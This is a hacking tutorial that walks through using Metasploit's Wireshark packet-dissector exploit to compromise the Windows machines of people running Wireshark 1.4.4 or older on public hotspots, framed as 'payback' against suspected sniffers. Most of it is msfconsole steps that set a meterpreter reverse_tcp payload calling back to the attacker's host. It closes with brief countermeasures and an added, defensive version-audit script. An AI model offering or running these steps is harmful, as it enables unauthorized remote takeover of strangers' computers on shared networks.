Type : Tutorial
Level : Medium
Victim O.S : Windows 7 SP1 (all Windows versions are affected)
Vulnerable Application : Wireshark <= 1.4.4
What is Wireshark?
Most people who study networking and security (maybe 95% of them) already know this tool. According to Wikipedia, Wireshark is:
a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.
For attack purposes, this tool is usually used to capture packets (TCP/UDP) that cross a wired or wireless network.
While I was in Bandung, Indonesia, connected to a free hotspot inside a mall or café, my firewall would usually show an alert every 5 minutes or less. That is because a lot of people there try scanning, collecting packets, intercepting the network, and so on. Once I even saw someone playing with their Wireshark inside that hotspot.
From my story above, it is really uncomfortable to know that someone is collecting your data with Wireshark, hoping to get something important out of it.
In this tutorial let's call it operation payback: the attacker is trying to collect our data, and we will pwn their computer. Fair, isn't it?
2. Operating System (I'm using Backtrack 5 R1 in this tutorial)
1. As we know, when you run Wireshark to collect data it is not usually for a short time (1 or 2 minutes); when you run this tool you want to collect as much data as possible. Collecting a lot of data takes more time, and collecting only a little data takes only a little time.
2. In this case we will pwn the attacker who is capturing our data with Wireshark as it is sent across the network. Open Metasploit by typing msfconsole and use the wireshark_packet_dect exploit.
use exploit/windows/misc/wireshark_packet_dect
set payload windows/meterpreter/reverse_tcp
3. To view the available options for this exploit, run the show options command from your msf console. In the following picture I set up only the important switches that are needed to perform this attack.
Information :
set interface eth0 --> our network card interface; to know whether you use wlan0 or eth0, run ifconfig from your BackTrack console
set lhost 192.168.8.92 --> your local computer used to attack
set lport 443 --> when the exploit is executed successfully, the port on which you want to receive the payload on your local computer
4. Before running the exploit command, let's say that the attacker is still collecting data with their Wireshark tool, like in the picture below.
5. Now run the exploit command.
Pwned!
FYI : this attack does not succeed 100% of the time; if no one on the network is using Wireshark to capture data, your exploit will return an error message.
1. Update your Wireshark to the latest version.
2. Use tunneling or encryption to protect your data.
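For countermeasure 1, an added example (not part of the original tutorial, and not a Metasploit or Wireshark tool): a small Python audit that parses version banners such as the output of "wireshark -v" or "tshark -v" (the banner format and the SVN revision numbers in the samples are assumed/constructed) and flags any install at or below the 1.4.4 release the page lists as vulnerable.

```python
import re

# Highest Wireshark release the tutorial lists as affected (Wireshark <= 1.4.4).
LAST_AFFECTED = (1, 4, 4)

# First dotted three-part number in the banner, e.g. "1.4.4" or "1.10.0".
_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)")


def parse_version(banner):
    """Return (major, minor, patch) from a version banner, or None.

    Tuples compare numerically, so 1.10.0 sorts above 1.4.4; a plain
    string comparison would get that wrong ("1.10.0" < "1.4.4").
    """
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def is_affected(banner):
    """True when the banner reports a version at or below 1.4.4."""
    v = parse_version(banner)
    return v is not None and v <= LAST_AFFECTED


def audit(banners):
    """Map host -> verdict for a list of (host, banner) pairs."""
    result = {}
    for host, banner in banners:
        if parse_version(banner) is None:
            result[host] = "unknown"       # no version found, check by hand
        elif is_affected(banner):
            result[host] = "UPDATE"        # vulnerable release, countermeasure 1
        else:
            result[host] = "ok"
    return result


# Constructed sample banners (assumed format; not captured from real hosts).
SAMPLE = [
    ("ws-01", "wireshark 1.4.4 (SVN Rev 36170 from /trunk-1.4)"),
    ("ws-02", "TShark 1.10.0 (SVN Rev 49790 from /trunk-1.10)"),
    ("ws-03", "Wireshark 1.2.9"),
    ("ws-04", "command not found"),
]

if __name__ == "__main__":
    for host, verdict in audit(SAMPLE).items():
        print(host, verdict)
```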
Hope it's useful.